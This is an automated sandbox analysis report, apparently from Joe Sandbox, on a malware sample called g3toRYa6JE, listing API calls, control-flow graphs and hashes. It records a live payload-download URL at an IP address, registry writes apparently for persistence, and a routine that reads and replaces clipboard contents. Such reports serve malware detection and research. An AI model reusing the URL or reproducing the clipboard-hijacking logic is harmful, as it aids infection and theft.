                                                                                                                                                                                                                              • API String ID: 2843524283-4068139069
                                                                                                                                                                                                                              • Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                                                                                                                                              • Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorExitLastThread
                                                                                                                                                                                                                              • String ID: <(@
                                                                                                                                                                                                                              • API String ID: 1611280651-4189137628
                                                                                                                                                                                                                              • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                              • Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 452 42e104-42e10f 453 42e111-42e123 call 42eab9 call 42a58d 452->453 454 42e125-42e138 call 42e0bb 452->454 470 42e175-42e178 453->470 460 42e166 454->460 461 42e13a-42e157 CreateThread 454->461 462 42e168-42e174 call 42e02d 460->462 464 42e179-42e17e 461->464 465 42e159-42e165 GetLastError call 42ea83 461->465 462->470 468 42e180-42e183 464->468 469 42e185-42e187 464->469 465->460 468->469 469->462
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0042E160
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2744730728-0
                                                                                                                                                                                                                              • Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                              • Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 473 434745-43475d call 439911 476 434770-434786 SetFilePointerEx 473->476 477 43475f-434764 call 42eab9 473->477 478 434797-4347a1 476->478 479 434788-434795 GetLastError call 42ea83 476->479 483 43476a-43476e 477->483 482 4347a3-4347b8 478->482 478->483 479->483 485 4347bd-4347c2 482->485 483->485
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043478F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                                                                              • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                              • Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 487 402ba3-402bcf RegCreateKeyExW 488 402bd1-402be3 RegSetValueExW 487->488 489 402be5-402be8 487->489 488->489 490 402bf3-402bf9 489->490 491 402bea-402bed RegCloseKey 489->491 491->490
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
                                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1818849710-0
                                                                                                                                                                                                                              • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                              • Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 492 42e064-42e071 call 431f4e 495 42e073-42e076 ExitThread 492->495 496 42e07c-42e084 492->496 496->495 497 42e086-42e08a 496->497 498 42e091-42e097 497->498 499 42e08c call 4354e6 497->499 501 42e0a4-42e0aa 498->501 502 42e099-42e09b 498->502 499->498 501->495 504 42e0ac-42e0ae 501->504 502->501 503 42e09d-42e09e CloseHandle 502->503 503->501 504->495 505 42e0b0-42e0ba FreeLibraryAndExitThread 504->505
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                                                                                                                                                • Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
                                                                                                                                                                                                                                • Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0042E076
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
                                                                                                                                                                                                                              • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1198197534-0
                                                                                                                                                                                                                              • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                              • Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 506 402394-4023a2 507 402557-402559 PostQuitMessage 506->507 508 4023a8-4023ad 506->508 509 40255f-402564 507->509 510 4023c6-4023cd 508->510 511 4023af-4023c1 DefWindowProcW 508->511 512 4023d4-4023db 510->512 513 4023cf call 401d9a 510->513 511->509 512->509 515 4023e1-402555 call 4010ba call 4029ea 512->515 513->512 515->509
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00402559
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3873111417-0
                                                                                                                                                                                                                              • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                              • Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001562), ref: 00401562
                                                                                                                                                                                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcslen$Sleep
                                                                                                                                                                                                                              • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                              • Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                              • Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000400,?,?,00780223,?,?), ref: 00780E19
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,00780223,?,?), ref: 00780E1E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction ID: c37cf524c63f5757edd935c017db940ef546b67fe649cc31a07347fd0354d86c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C774994047E5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                              • Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                                              • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                              • Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 323602529-0
                                                                                                                                                                                                                              • Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                              • Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                                              • Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                              • Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                                              • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                              • Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                              • Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                              • Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004103B7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2005118841-0
                                                                                                                                                                                                                              • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                                                                                                                                              • Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                              • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0069400E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872584271.0000000000693000.00000040.00000020.00020000.00000000.sdmp, Offset: 00693000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_693000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction ID: 990af2c1fbf8c30db879b1b64b9feb75e6a5ce165891a36177a5a4f6d1483188
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF113C79A00208EFDB01DF98C985E98BBF5AF08350F058094FA489B362D775EA50DF80
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0078194D
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001541,0000004C), ref: 00781957
                                                                                                                                                                                                                                • Part of subcall function 0078CE6D: _strlen.LIBCMT ref: 0078CE84
                                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00781984
                                                                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 00781994
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 007819B0
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 007819DF
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00781B23
                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00781B39
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00781B46
                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00781B70
                                                                                                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00781B79
                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00781B80
                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00781BA4
                                                                                                                                                                                                                              • Sleep.KERNEL32(000002D2), ref: 00781BAF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                              • String ID: 4#E$i
                                                                                                                                                                                                                              • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                              • Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
